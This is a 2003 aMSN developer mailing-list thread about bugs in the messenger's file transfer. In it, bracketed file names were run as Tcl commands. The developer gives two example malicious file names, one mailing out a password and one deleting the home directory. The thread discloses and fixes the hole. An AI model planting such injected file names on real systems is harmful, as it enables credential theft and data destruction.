From: Alvaro J. I. <air...@us...> - 2003-02-05 19:46:44
|
Ok, as you like. I've tested and it doesn't happen now. Anyway, the comma= nd=20 would be executed AFTER you accept the file, so if you got a file called=20 something like: file_[shell "mail an...@ho... -s subject \"$password\""].txt or: file_[rm ~/* -f -r].txt just don't accept it ;) greets. Alvaro. El Mi=E9 05 Feb 2003 19:52, Richard Strand escribi=F3: > Hey. > I thought about submitting the bug to some computer-security list to ge= t > some more experienced security experts check if it could lead to some k= inda > remote compromise, but then i stopped myself. > I am for giving out information about vulnerabilities etc in order to k= eep > information free, but... i dont know, it just wouldnt feel right with a= msn > so i didnt :D > > I havent tried the cvs version yet caues the last time i updated via th= e > cvs dir, i got some weird errormessages (i dont have them logged > unfortunately). I'll just wait until the cvs tar.gz comes up instead, m= ore > convenient :) > > > // :O "Somebody set us up the bomb!" > > >Hi, I'm going to check the filetransfer bug now. The problem is tcl tr= ies > >to > >run the command inside the brackets [1]. This can be a security hole, = as > >anyone could run a command on your computer if you accept a file with > >[xxxxx] > >where xxxxx is a dangerous command. So i'm going to fix it quick. > > > >About the =E5, =E4 /and or =F6 characters, have you tried it now with= the cvs > >version of amsn? I fixed the procedure to do the characters encoding t= o > > fix problems with these characters in nicks, so maybe it's fixed in f= iles > > too. > > > >Greets. Alvaro. > > > >El Vie 31 Ene 2003 00:13, Richard Strand escribi=F3: > > > This (note the filename!)...: > > > > > > [00:10:20] (*)...=DE=E2=A3=F4M=E2...(*) hey ya llegue!!!! soy yo!:= Vill du ta > > > >emot > > > > > filen 'c-song[1].swf' ( 857388 bytes ) Den kommer att sparas i > > > /home/zync/amsn_received - (Acceptera / Avsl=E5 ) > > > ---------- > > > ---------- > > > Fil=F6verf=F6ring accepterad. > > > ---------- > > > > > > > > > ...lead to this: > > > > > > > > > > > > invalid command name "1" > > > while executing > > > "1" > > > > > > ---end of the error message!------- > > > > > > Error in code-parsing while reading the filename? I think thats the > > > problem, but i cant code perl so i cant patch it :P > > > > > > another bug is when a file got =E5, =E4 /and or =F6 in it. possible= even it a > > > file got other extended ascii chars in them. > > > > > > when you send a file with those chars in them, it forces the other > > > >person > > > > > in the chat to leave the conversation(it doesnt close their window = at > > > >their > > > > > computer, but amsn states that 'user leaves conversation' and that = user > > > wont get the filetransfer Accept / decline question. > > > > > > also, when you send a textstring with over 1200 characters, they're > > > >also > > > > > forced to quit and that string wont get sent to them. > > > > > > a cool thing to implement would be an option to see how many chars = you > > > >have > > > > > written in the message like "156 / 1200" (WRITTEN / TOTAL) and, > > > >ofcource, > > > > > a 1200 char limit (or whatever the MSN protocol max-limit is nowday= s, > > > it was 1200 last time i checked. > > > > > > _________________________________________________________________ > > > Help STOP SPAM with the new MSN 8 and get 2 months FREE* > > > http://join.msn.com/?page=3Dfeatures/junkmail > > > >-- > > > >(:=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D:) > > Alvaro J. Iradier Muro > > air...@us... > >^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > > > > > >------------------------------------------------------- > >This SF.NET email is sponsored by: > >SourceForge Enterprise Edition + IBM + LinuxWorld =3D Something 2 See! > >http://www.vasoftware.com > >_______________________________________________ > >Amsn-devel mailing list > >Ams...@li... > >https://lists.sourceforge.net/lists/listinfo/amsn-devel > > _________________________________________________________________ > MSN 8 with e-mail virus protection service: 2 months FREE* > http://join.msn.com/?page=3Dfeatures/virus > > > > ------------------------------------------------------- > This SF.NET email is sponsored by: > SourceForge Enterprise Edition + IBM + LinuxWorld =3D Something 2 See! > http://www.vasoftware.com > _______________________________________________ > Amsn-devel mailing list > Ams...@li... > https://lists.sourceforge.net/lists/listinfo/amsn-devel --=20 (:=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D:) Alvaro J. Iradier Muro air...@us... ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |